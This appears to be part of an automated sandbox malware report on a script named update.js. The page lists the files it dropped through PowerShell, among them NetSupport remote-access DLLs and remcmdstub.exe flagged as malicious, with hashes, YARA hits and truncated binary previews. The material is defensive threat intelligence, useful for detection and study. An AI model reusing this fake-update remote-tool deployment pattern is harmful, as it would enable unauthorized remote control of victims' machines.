                            Preview://353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v

                            C:\Users\user\AppData\Roaming\RYMB15\msvcr100.dll

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):773968
                            Entropy (8bit):6.901559811406837
                            Encrypted:false
                            SSDEEP:
                            MD5:0E37FBFA79D349D672456923EC5FBBE3
                            SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                            SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                            SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\RYMB15\nskbfltr.inf

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):328
                            Entropy (8bit):4.93007757242403
                            Encrypted:false
                            SSDEEP:
                            MD5:26E28C01461F7E65C402BDF09923D435
                            SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                            SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                            SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                            Malicious:false
                            Reputation:unknown
                            Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                            C:\Users\user\AppData\Roaming\RYMB15\nsm_vpro.ini

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):46
                            Entropy (8bit):4.532048032699691
                            Encrypted:false
                            SSDEEP:
                            MD5:3BE27483FDCDBF9EBAE93234785235E3
                            SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                            SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                            SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                            Malicious:false
                            Reputation:unknown
                            Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                            C:\Users\user\AppData\Roaming\RYMB15\package_metadata

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):9
                            Entropy (8bit):2.4193819456463714
                            Encrypted:false
                            SSDEEP:
                            MD5:72E3BED9C0F2498AE7F7B8251EB63956
                            SHA1:E9366F86EF5C31D2141FB5D209214D94DD1E24AF
                            SHA-256:96E946E3EE860C6FAF9557327EFA311AE804AA58DD58632261B16C3C567BAA5A
                            SHA-512:68EFACA86096F94C5FC7972F073361E4B12A3219834C0F3A6933837A35FA023A87D310B9E5AA2A8F88F9069320C60A490A24BA47219925010D69F88910C99758
                            Malicious:false
                            Reputation:unknown
                            Preview:1.0.8.0..

                            C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dll

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):33144
                            Entropy (8bit):6.7376663312239256
                            Encrypted:false
                            SSDEEP:
                            MD5:34DFB87E4200D852D1FB45DC48F93CFC
                            SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                            SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                            SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dll, Author: Joe Security
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dll, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 3%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\RYMB15\remcmdstub.exe

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):63864
                            Entropy (8bit):6.446503462786185
                            Encrypted:false
                            SSDEEP:
                            MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                            SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                            SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                            SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:ASCII text, with very long lines (463)
                            Entropy (8bit):5.088465781908519
                            TrID:
                            • Java Script (8502/1) 68.00%
                            • Digital Micrograph Script (4001/1) 32.00%
                            File name:update.js
                            File size:4'058'589 bytes
                            MD5:0d49cb3d2e8bfb9fce01adc2485da2b5
                            SHA1:ce08e5084103407eebec38525dbe36a8403b5465
                            SHA256:d43dbee4487ce35554643d0ceb620f179351a149f74373251e8efd1676604f6f
                            SHA512:e328e6c4ac5c468b1b7698ca94b6fffb831e1f248d23a8c4ce2c55a62c50064893cf97cf4be860fdc49fab4187d549d972299c485227b2d6c0cf6cce25b49147
                            SSDEEP:49152:6sz6FvpOiHY7sz6FvpOiHYXsz6FvpOiHY7sz6FvpOiHYMsz6FvpOiHY7sz6FvpOQ:60WQ0Ws0WQ0Wp0WQ0W5
                            TLSH:8016640879E3988CA523B4795A7FE844B2354117E09EDED1B49CF9F40FA00744A7AE7E
                            File Content Preview:/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/..! function(e, f) {. "object2" == typeof exports && "undefined" != typeof module ? f(exports) : "function" == typeof define && define.amd ? define(["exports"], f) : f((

                            File Icon

                            Icon Hash:68d69b8bb6aa9a86